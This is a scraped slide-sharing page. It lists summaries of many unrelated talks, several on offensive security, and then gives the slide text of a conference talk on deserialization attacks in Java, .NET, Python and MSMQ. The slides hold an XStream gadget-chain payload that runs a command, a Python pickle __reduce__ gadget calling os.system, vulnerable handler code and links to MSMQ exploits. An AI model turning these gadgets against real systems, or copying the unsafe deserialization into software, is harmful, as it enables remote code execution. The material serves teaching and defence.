Presented by Dor Tumarkin, Application Security Researcher and Team Leader at Checkmarx
Take the plunge into deserialization attacks - from understanding the fundamentals of serialization to vulnerability breakdown, through RCE demos in various technologies (Java, C#, Python). Includes research and exploit demo of never-before-seen vulnerabilities in Microsoft’s Message Queue.
Originally presented at BSidesLV 2018 and AppSecIL 2018. Slides have been altered to remove animations.
Python 3000 (Python 3.0) is an upcoming major release that will break backwards compatibility to fix early design mistakes and issues. It introduces many changes like Unicode as the default string type, a reworked I/O library, print as a function, and removal of some old features like classic classes. The document provides details on the changes and recommends projects support both Python 2.6 and 3.0 during the transition period.
Joxean Koret - Database Security Paradise [Rooted CON 2011] (RootedCON)
The document discusses vulnerabilities found in various database software products through analyzing their code and installation directories. Local privilege escalation bugs were found in IBM DB2 and Informix by exploiting how environment variables and shared libraries were handled. Remote code execution bugs were also discovered in UniData and Informix through fuzzing protocols and by exploiting unsafe functions. The document encourages searching for more bugs in database software.
This document discusses various overflow issues that can occur with the splice and vmsplice Linux kernel functions. It describes stack and buffer overflows that can happen due to race conditions when accessing pipe buffers. It also proposes a pool overflow technique using SLUB memory and controlled data read from a TTY device to spray the kernel memory and potentially overflow adjacent objects. Finally, it notes that further research is needed to determine a suitable target and exploit methodology, and hints that pipe buffer sizes may allow overflowing kernel memory allocations.
Codetainer: a Docker-based browser code 'sandbox' (Jen Andre)
Codetainer is a browser-based sandbox for running Docker containers. It allows users to "try 'X' in your browser" for any X by running Docker containers in an isolated and programmable manner directly in the browser. Codetainer uses Docker APIs to launch and manage lightweight containers via a Go-based API server. Users can create and register Docker images, launch "codetainers" from those images, and interact with the codetainers through the browser via websockets, viewing terminals and sending keystrokes. Codetainer aims to provide a secure and flexible environment for use cases like tutorials, training, and remote management while addressing challenges around container introspection and security.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by... (CODE BLUE)
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with Linux kernel 3.10 or earlier last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker can only overwrite the freed object at a fixed offset with a pointer to the object itself. How to achieve kernel code execution with this bug can be very challenging. To solve the problem, we propose a new method which uses iovec to re-fill the freed object and compromises the pipe subsystem in the kernel. In this way we can convert this unusual memory corruption into arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is a UAF due to a race condition; it may corrupt a critical kernel structure and lead to a kernel crash when the scheduler switches context back to the attacker's process. So we'll introduce a way to freeze the attacker's process soon after the UAF happens, stop the kernel from crashing, and make the exploit reliable.
In summary, this presentation presents the new techniques for exploiting use-after-free bugs that we just found in the Android kernel. The ideas of exploitation are fresh, and the details of the bugs have also never been discussed before.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs (Shakacon)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where the hacker/penetration-tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g., communicating with a bind-shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
Day by day, we store more and more confidential information on our computers, from site account credentials to our bank account. Every day, malware becomes more and more silent; it doesn't want you to be suspicious, it just wants to stay in your device to do something... that you don't really want.
Richard Wartell - Malware is hard. Let's go shopping!! (Shakacon)
Writing a successful, protected, targeted, malicious binary is a software development task that requires great skill. A well-written piece of targeted malware should evade anti-virus solutions, hide its network communications, protect itself against reverse engineering, and clean up any forensic evidence of its existence on the system. However, writing a mediocre piece of targeted malware that works most of the time is easy. There are many publicly available backdoors, downloaders, and keyloggers that require little to no expertise to use, and poorly trained malware authors try to roll their own all the time.
Working in malware detection and reverse engineering, I see some of the intelligent choices malware authors make, but more often I see the hilariously poor code they write. During this talk I will demonstrate how to reverse engineer real world malware. I will focus on samples with interesting and comical mistakes, as well as samples that are impressive and well written.
New and improved hacking Oracle from web apps - Sumit Sidharth (owaspindia)
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
This document provides instructions on how to use SQL injection to execute operating system commands on a Microsoft SQL Server and retrieve a reverse shell within 30 minutes of a penetration test. It demonstrates exploiting SQL injection to execute a VBScript that downloads and executes a binary, providing remote code execution on the system through a reverse shell. Tricks are discussed like using VBPacker to obfuscate the payload and bypass outbound filtering. The ability to leverage this technique through other vulnerabilities like CSRF is also mentioned.
We will talk about edge cases we don't usually think about, show examples from the real world, and share some tips and best practices on how to make your code safer in the real world.
This document provides an overview of Python fundamentals including basic concepts like data types, operators, flow control, functions and classes. It begins with an introduction to Python versions and environments. The outline covers topics like Hello World, common types and operators for numeric, string and container data types. It also discusses flow control structures like if/else, while loops and for loops. Finally, it briefly mentions functions, classes, exceptions and file I/O.
This document discusses how to protect databases from SQL injection vulnerabilities by fuzz testing databases to find vulnerabilities before hackers do. It covers common SQL injection techniques like in-band and out-of-band injection. It then describes how to build a custom fuzzer using PL/SQL to fuzz test databases, track results, discover vulnerable code, invoke code with test parameters, and report findings. The document demonstrates how fuzz testing can find real vulnerabilities and provides examples of an interface and secure coding techniques to help prevent vulnerabilities.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
This document discusses Dan Kaminsky's presentation on black ops of TCP/IP. It begins with an introduction of Kaminsky and what topics he plans to cover, including MD5 hashes, IP fragmentation, firewall/IPS fingerprinting, DNS poisoning, and scanning the internet. It then demonstrates how two webpages with different content can have the same MD5 hash due to collisions. It discusses using IP fragmentation and timing attacks to evade intrusion detection systems. It also describes techniques for fingerprinting firewalls and intrusion prevention systems based on their behavior in response to invalid traffic. Finally, it cautions against automatic shunning of IP addresses by security devices to avoid accidentally blocking critical infrastructure like root DNS servers.
This document provides an overview of JavaScript concepts and best practices. It discusses objects as hashes, functions as first-class objects, loose typing, closures, prototypes, JSON, cross-domain AJAX, testing with Jasmine, CoffeeScript, libraries like jQuery, global scope issues, regular expressions, XSS, hoisting, and other JavaScript quirks. It also provides resources for further learning JavaScript.
Get-Help: An intro to PowerShell and how to Use it for Evil (jaredhaight)
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
This document contains notes from a presentation given by Neal Ford on productivity techniques for programmers. Some key topics covered include: accelerating work by using keyboard shortcuts, search over navigation, reducing distractions, applying DRY principles, and automating repetitive tasks. Ford advocates focusing on acceleration, focus, and automation to work more efficiently. He provides many examples of tools and techniques to improve productivity.
The Dirty Little Secrets They Didn't Teach You In Pentesting Class (Rob Fuller)
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
This document provides an agenda and overview for a talk on exploiting SQL injections from web applications against Oracle databases. The talk covers topics like PL/SQL vs SQL injection, extracting data, privilege escalation, OS code execution, second order attacks, and tools for exploitation like Bsqlbf. It discusses challenges like limitations of SQL in Oracle and lack of documentation. Examples are provided for various exploits like using DBMS_EXPORT_EXTENSION and DBMS_JAVA_TEST functions to escalate privileges or execute OS commands.
Slackware Demystified provides an overview of the Slackware Linux distribution. It discusses Slackware's philosophy of keeping things simple and sticking close to upstream. It describes Slackware's init system, configuration files, package structure, and community support. The presentation emphasizes Slackware's minimalist approach and encourages learning through documentation rather than abstracted interfaces.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
Drupal Camp Atlanta 2011 - Drupal Security (Mediacurrent)
Introduction to security on Drupal and introduces some testing tools, common problems and solutions.
We also introduce the concept of a response team and best practices to get you started.
Presented at BJUG, 6/12/2012 by Roger Brinkley
This talk is on 55 new features in Java 7 you (probably) didn't hear about, in an ignite format of one per minute. No stopping, no going back... Questions, sure, but only if time remains (otherwise save them for later).
The document summarizes some of the new features introduced in Java 7. It discusses binary literals, underscores in numeric literals, strings in switch statements, automatic resource management using try-with-resources, multi-catch exceptions, more precise rethrowing of exceptions, diamond operator for generic types, varargs warnings and suppression, Java NIO.2 features for file navigation, directories, symbolic links, and walking file trees. The document provides examples and explanations of how to use these new Java 7 language features.
DEF CON 27 - TRAVIS PALMER - first try dns cache poisoning with ipv4 and ipv6... (Felipe Prado)
This document discusses a DNS cache poisoning attack that exploits IP fragmentation. It begins with background on DNS and DNSSEC. It then explains how predictable IPIDs in DNS responses can be inferred, allowing an off-path attacker to poison caches with few attempts. The attack works across IPv4 and IPv6 by targeting predictable timing of DNS requests. Mitigations are discussed but the attack remains effective against current recommendations.
1. This document introduces IDAPython, which allows users to write Python scripts to automate tasks in IDA like reversing binaries.
2. It discusses how to install IDAPython and provides some simple examples of using it to walk functions and disassembly.
3. More complex examples are provided for finding system calls in a binary and for deobfuscating code using IDAPython scripts. Exercises are suggested for finding vulnerabilities using IDAPython.
HCL Notes and Domino License Cost Reduction in the World of DLAU (panagenda)
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar, with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able to lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc.
- Practical examples and best practices to implement right away
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/temporal-event-neural-networks-a-more-efficient-alternative-to-the-transformer-a-presentation-from-brainchip/
Chris Jones, Director of Product Management at BrainChip , presents the “Temporal Event Neural Networks: A More Efficient Alternative to the Transformer” tutorial at the May 2024 Embedded Vision Summit.
The expansion of AI services necessitates enhanced computational capabilities on edge devices. Temporal Event Neural Networks (TENNs), developed by BrainChip, represent a novel and highly efficient state-space network. TENNs demonstrate exceptional proficiency in handling multi-dimensional streaming data, facilitating advancements in object detection, action recognition, speech enhancement and language model/sequence generation. Through the utilization of polynomial-based continuous convolutions, TENNs streamline models, expedite training processes and significantly diminish memory requirements, achieving notable reductions of up to 50x in parameters and 5,000x in energy consumption compared to prevailing methodologies like transformers.
Integration with BrainChip’s Akida neuromorphic hardware IP further enhances TENNs’ capabilities, enabling the realization of highly capable, portable and passively cooled edge devices. This presentation delves into the technical innovations underlying TENNs, presents real-world benchmarks, and elucidates how this cutting-edge approach is positioned to revolutionize edge AI across diverse applications.
What is an RPA CoE? Session 1 – CoE VisionDianaGray10
In the first session, we will review the organization's vision and how this has an impact on the COE Structure.
Topics covered:
• The role of a steering committee
• How do the organization’s priorities determine CoE Structure?
Speaker:
Chris Bolin, Senior Intelligent Automation Architect Anika Systems
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...Alex Pruden
Folding is a recent technique for building efficient recursive SNARKs. Several elegant folding protocols have been proposed, such as Nova, Supernova, Hypernova, Protostar, and others. However, all of them rely on an additively homomorphic commitment scheme based on discrete log, and are therefore not post-quantum secure. In this work we present LatticeFold, the first lattice-based folding protocol based on the Module SIS problem. This folding protocol naturally leads to an efficient recursive lattice-based SNARK and an efficient PCD scheme. LatticeFold supports folding low-degree relations, such as R1CS, as well as high-degree relations, such as CCS. The key challenge is to construct a secure folding protocol that works with the Ajtai commitment scheme. The difficulty, is ensuring that extracted witnesses are low norm through many rounds of folding. We present a novel technique using the sumcheck protocol to ensure that extracted witnesses are always low norm no matter how many rounds of folding are used. Our evaluation of the final proof system suggests that it is as performant as Hypernova, while providing post-quantum security.
Paper Link: https://eprint.iacr.org/2024/257
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
Your One-Stop Shop for Python Success: Top 10 US Python Development Providersakankshawande
Simplify your search for a reliable Python development partner! This list presents the top 10 trusted US providers offering comprehensive Python development services, ensuring your project's success from conception to completion.
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
Main news related to the CCS TSI 2023 (2023/1695)Jakub Marek
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
Generating privacy-protected synthetic data using Secludy and MilvusZilliz
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
The Microsoft 365 Migration Tutorial For Beginner.pptxoperationspcvita
This presentation will help you understand the power of Microsoft 365. However, we have mentioned every productivity app included in Office 365. Additionally, we have suggested the migration situation related to Office 365 and how we can help you.
You can also read: https://www.systoolsgroup.com/updates/office-365-tenant-to-tenant-migration-step-by-step-complete-guide/
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframePrecisely
Inconsistent user experience and siloed data, high costs, and changing customer expectations – Citizens Bank was experiencing these challenges while it was attempting to deliver a superior digital banking experience for its clients. Its core banking applications run on the mainframe and Citizens was using legacy utilities to get the critical mainframe data to feed customer-facing channels, like call centers, web, and mobile. Ultimately, this led to higher operating costs (MIPS), delayed response times, and longer time to market.
Ever-changing customer expectations demand more modern digital experiences, and the bank needed to find a solution that could provide real-time data to its customer channels with low latency and operating costs. Join this session to learn how Citizens is leveraging Precisely to replicate mainframe data to its customer channels and deliver on their “modern digital bank” experiences.
Driving Business Innovation: Latest Generative AI Advancements & Success StorySafe Software
Are you ready to revolutionize how you handle data? Join us for a webinar where we’ll bring you up to speed with the latest advancements in Generative AI technology and discover how leveraging FME with tools from giants like Google Gemini, Amazon, and Microsoft OpenAI can supercharge your workflow efficiency.
During the hour, we’ll take you through:
Guest Speaker Segment with Hannah Barrington: Dive into the world of dynamic real estate marketing with Hannah, the Marketing Manager at Workspace Group. Hear firsthand how their team generates engaging descriptions for thousands of office units by integrating diverse data sources—from PDF floorplans to web pages—using FME transformers, like OpenAIVisionConnector and AnthropicVisionConnector. This use case will show you how GenAI can streamline content creation for marketing across the board.
Ollama Use Case: Learn how Scenario Specialist Dmitri Bagh has utilized Ollama within FME to input data, create custom models, and enhance security protocols. This segment will include demos to illustrate the full capabilities of FME in AI-driven processes.
Custom AI Models: Discover how to leverage FME to build personalized AI models using your data. Whether it’s populating a model with local data for added security or integrating public AI tools, find out how FME facilitates a versatile and secure approach to AI.
We’ll wrap up with a live Q&A session where you can engage with our experts on your specific use cases, and learn more about optimizing your data workflows with AI.
This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
2. AGENDA
Intro to Serialization/Deserialization
  Overview
  In Code
  Real-Life Scenarios
Languages, Frameworks, Exploitation
  Java
  .NET
  Python
  PHP?
  Go?
Built-in Deserialization Attacks
Conclusions
  Best Practices and Mitigation Basics
3. ASSUMPTIONS
You’ll probably enjoy this most if you have:
Some familiarity with code
Fundamental exploitation
Chill regarding over-simplifications
The ability to GO FAST, because we gonna
4. ABOUT ME
AppSec Researcher TL @ Checkmarx (2 yrs)
Formerly a Senior Consultant @ Cisco’s COE – RT, PT (2.5 yrs)
7 years actively poking s*it until it explodes
Father of one epic girl and one shaggy doggo
Verbose AF
Opinions (and naughty words) are my own and do not reflect my employer’s, obviously
DorTumarkin
Dor.Tumarkin@Checkmarx.com
5. "Serialization is the process of translating data structures or object state into a format that can be stored or transmitted and reconstructed later."
- Wikipedia
8. INTRO TO SERIALIZATION
Can be divided into 3 types of serialization formats
Language Native – specific for a language
Generic – CSV, JSON, YAML, XML
Specialized – Protobuf, MessagePack, CBOR (Out of scope)
9. INTRO TO DESERIALIZATION
The serialized object can then be transmitted over a network, stored in a file, or written to a DB.
Most standard serializers will work with all native serializable data structures, which can, themselves, often reference almost any class.
10. INTRO TO DESERIALIZATION
It’s kind of like making Soup in a Cup: you take a bowl of soup, and you dehydrate it into a powder.
Checkmarx is not sponsored by any soup vendors. All rights belong to their respective owners.
12. DESERIALIZATION IN CODE
A basic example of (de)serialization in Java, using XStream, a very popular XML serializer. ATestingClass is a plain data class holding the four fields below:

    import com.thoughtworks.xstream.XStream;

    int id = 1;
    String name = "John Doe";
    String address = "1 Elm St.";
    String[] items = new String[] {"Alarm Clock", "Baseball Bat"};
    ATestingClass testingObj = new ATestingClass(id, name, address, items);
    XStream xstream = new XStream();              // default, unrestricted XStream instance
    System.out.println(xstream.toXML(testingObj)); // serialize the object graph to XML
13. DESERIALIZATION IN CODE
The console output is:

    <ATestingClass>
      <id>1</id>
      <name>John Doe</name>
      <address>1 Elm St.</address>
      <items>
        <string>Alarm Clock</string>
        <string>Baseball Bat</string>
      </items>
    </ATestingClass>

This format can be easily transmitted, stored, etc.
14. DESERIALIZATION IN CODE
This object can then be reconstructed from the XML XStream produced earlier (held here in the String serializedATestingClass):

    ATestingClass newATestingClass =
        (ATestingClass) xstream.fromXML(serializedATestingClass); // parse XML, instantiate, populate fields

    System.out.println(newATestingClass.getName());

Which produces the following output:
John Doe
15. DESERIALIZATION CAVEATS
The most significant thing to consider here is that a class must be identical in types between both source (serialized) and destination (deserialized) – otherwise, errors may occur.
16. REAL WORLD USE CASES
APIs – for example, the Struts2 REST API uses deserialization to convert XML to objects
Saving current application state to a file/DB
17. REAL WORLD USE CASES
Server-to-server distributed workload – e.g. pickling in Python is often used to distribute workload across processes and systems
Many more!
22. ACKNOWLEDGEMENTS
Chris Frohoff
• Marshalling Pickles
• ysoserial
Oleksandr Mirosh, Alvaro Munoz
• Friday the 13th JSON Attacks
• ysoserial.net ObjectDataProvider
James Forshaw
• Are You My Type? Breaking .NET Through Serialization
• ysoserial.net TypeConfuseDelegate
Man Yue Mo
• Disclosing CVE-2017-9805 & Exploit Gadget
29. EXPLOITATION – GO GO GADGET!
This is an example of an Apache Commons based gadget chain (more later)
Commons is very popular
Part of Struts2 already
Very difficult to detect with heuristics

    <map>
      <entry>
        <jdk.nashorn.internal.objects.NativeString>
          <flags>0</flags>
          <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
            <dataHandler>
              <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
                <is class="javax.crypto.CipherInputStream">
                  <cipher class="javax.crypto.NullCipher">
                    <initialized>false</initialized>
                    <opmode>0</opmode>
                    <serviceIterator class="javax.imageio.spi.FilterIterator">
                      <iter class="javax.imageio.spi.FilterIterator">
                        <iter class="java.util.Collections$EmptyIterator" />
                        <next class="java.lang.ProcessBuilder">
                          <command>
                            <string>cmd</string>
                            <string>/c</string>
                            <string>calc</string>
31. DESERIALIZATION EXPLOITATION
What just happened…?
The naïve deserializer inside Struts2’s REST API (which is, again, XStream) does not restrict which classes can be deserialized by XStream!
And it calls the default XStream constructor:
33. EXPLOITATION – GO GO GADGET!
Gadget Chains are a nickname for nested, serialized objects
They chain together what deserialization does:
Sets instance variables
Instance methods are automatically invoked
35. EXPLOITATION – GO GO GADGET!
They can become extremely difficult to design
Must live off the land – use available classes
Must parse
However – don’t always have to complete deserialization
42. .NET GADGETS
“Safe” deserialization is possible:
Implementation uses the generic notation as the expected Type, and fails on time
Without it, anything gets deserialized
There are ways to have multiple types, of course
The bigger issue is – usage is vague
Good
43. .NET GADGETS
What exception was thrown?
Since the cast was of the wrong object, an exception occurred
TOO LATE
47. DESERIALIZATION IN PYTHON
Strictly typed languages would have an easier time looking ahead at classes during construction
Untyped languages, on the other hand…
50. DESERIALIZATION IN PYTHON
Generating a Python gadget for pickles is simple:
__reduce__ provides the pickle-able form of a method and args tuple
Basically spring-loaded code injection bombs

    import os
    import pickle

    class RunCalc(object):
        def __reduce__(self):
            # pickle stores "call os.system with these args"; the call happens inside pickle.loads
            return (os.system, ("calc.exe",))

    print(pickle.dumps(RunCalc()))
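The same allow-list idea applied to Python’s pickle, as an added example that is not part of the talk: a naïve pickle.loads calls whatever callable the payload’s __reduce__ names while rebuilding the object, whereas an Unpickler subclass that overrides find_class resolves globals only from an explicit allow-list and refuses anything else before it can run (the counterpart of restricting which classes XStream may instantiate in the Struts2 case above). Gadget, Person and the allow-list contents are constructed for the demo; os.getpid stands in for os.system so that the demo has no side effects, and its return value is what proves the callable ran during load.

```python
import io
import os
import pickle

# Everything below is constructed for the demo; it is not the talk's code.


class Gadget:
    """Same shape as the talk's RunCalc: __reduce__ names a callable plus an args tuple.
    os.getpid stands in for os.system so the demo has no side effects."""

    def __reduce__(self):
        return (os.getpid, ())


class Person:
    """A plain data class the receiving application legitimately expects."""

    def __init__(self, name, address):
        self.name = name
        self.address = address


# Allow-list: (module, qualified name) -> the only objects the unpickler may resolve.
ALLOWED_GLOBALS = {
    (Person.__module__, Person.__qualname__): Person,
}


class RestrictedUnpickler(pickle.Unpickler):
    """Resolves GLOBAL/STACK_GLOBAL references only from the allow-list and never
    imports anything, so an unexpected callable is refused before it can run."""

    def find_class(self, module, name):
        try:
            return ALLOWED_GLOBALS[(module, name)]
        except KeyError:
            raise pickle.UnpicklingError(
                f"refusing to resolve {module}.{name}: not on the allow-list") from None


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def naive_demo():
    """pickle.loads calls the gadget's callable while rebuilding the object."""
    result = pickle.loads(pickle.dumps(Gadget()))
    return result == os.getpid()  # True: the stand-in callable ran during load


def restricted_demo():
    """The same bytes through the restricted unpickler: rejected, nothing ran."""
    try:
        restricted_loads(pickle.dumps(Gadget()))
    except pickle.UnpicklingError as e:
        return str(e)
    return "accepted"


def restricted_roundtrip():
    """Legitimate data still round-trips through the allow-list."""
    p = restricted_loads(pickle.dumps(Person("John Doe", "1 Elm St.")))
    return (type(p) is Person, p.name, p.address)


if __name__ == "__main__":
    print("naive loads ran the callable:", naive_demo())
    print("restricted loads:", restricted_demo())
    print("restricted round-trip:", restricted_roundtrip())
```

The allow-list maps to the objects themselves rather than letting find_class import by name, so a payload cannot reach anything the application did not explicitly register; the same unpickler is what a queue consumer would use on a message body it did not produce.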
51. DESERIALIZATION IN UNTYPED LANGUAGES
PHP built-in deserialization is very… specific?
Deserialization only triggers specific magic methods (__wakeup, __destruct)
Sets members without constructor
52. DESERIALIZATION IN UNTYPED LANGUAGES
PHP’s own limitations/design save it:
Built-in methods are actually “language constructs”
Not part of any class
Essentially “white-lists” to custom classes
Can still be exploited under certain conditions for many things, including RCE
…contextually, more so than Java/.NET
53. POP QUIZ
What would deserialization in Go look like?
More or less complicated to exploit?
54. ROOT CAUSE
At this point some common threads are very noticeable:
Deserialization streamlines object construction from strings/bytes
Dangerous IFF you naïvely deserialize tainted inputs! Never trust those!
Remote naïve deserialization is super dangerous, tons of RCE samples
55. ROOT CAUSE
But in many cases deserialization is only local or trusted
And there are alternatives in APIs
Not like there are whole technologies designed to distribute objects via serialization, right?
58. MESSAGE QUEUES
Message Queues literally distribute messages via a queue
Agnostic MQs just send strings or bytes (Rabbit, Kafka), which can be wrapped with senders and receivers
59. DESERIALIZATION IN MESSAGE QUEUES
But some allow sending objects!
End-to-End: Serialize → Publish → Subscribe → Deserialize
So… are end-to-end object MQs basically an RCE delivery system?
60. DESERIALIZATION IN MESSAGE QUEUES
Java’s JMS is well documented as vulnerable
Many Java samples available
“Pwning Your Java Messaging” – BH2016, by Matthias Kaiser

    public void onMessage(Message message) {
        try {
            ObjectMessage objectMessage = (ObjectMessage) message;
            objectMessage.getObject(); // BOOM: deserializes whatever object the sender put in the body
        } catch (JMSException e) {
            // error handling
        }
    }
61. DESERIALIZATION IN MESSAGE QUEUES
Begs the question – what about .NET?
It has Microsoft Message Queue! (MSMQ)
Ancient
Still in use though :D
62. DESERIALIZATION IN MESSAGE QUEUES
MSMQ Server is a Windows Feature
Uses two object serialization formatters: XML, Binary
63. DESERIALIZATION IN MESSAGE QUEUES
Embarked on some Research™!
The only reference we found to these formatters in a security context was:
70. DESERIALIZATION IN MESSAGE QUEUES
MSDN samples being dangerous isn’t great
But is this enough? Is there something a little more official?
Maybe it’s just bad because of brevity?
76. MSMQ EXPLOITATION DEMO
Exploit utilizes the ysoserial.net TypeConfuseDelegate gadget as message body to attack .NET 4
https://github.com/Dor-Tumarkin/MSMQ-BinaryMessageFormatter-Exploit-for-.NET-4.5
Also successfully modified the ysoserial.net ActivitySurrogateSelector gadget to work with the original target version, .NET 3.5
https://github.com/Dor-Tumarkin/MSMQ-BinaryMessageFormatter-Exploit-for-.NET-3.5
77. DESERIALIZATION IN MSMQ
MSMQ with BinaryMessageFormatter (BMF):
Exploitable by default
Cannot explicitly set types
Intended for remote use
78. DESERIALIZATION IN MSMQ
In what scenarios is BinaryMessageFormatter used?
Complex objects
Large messages
High-throughput
Not particularly common in open-source, though
Observed traces in some middleware implementations
Also in some workload distribution code
79. DESERIALIZATION IN MSMQ
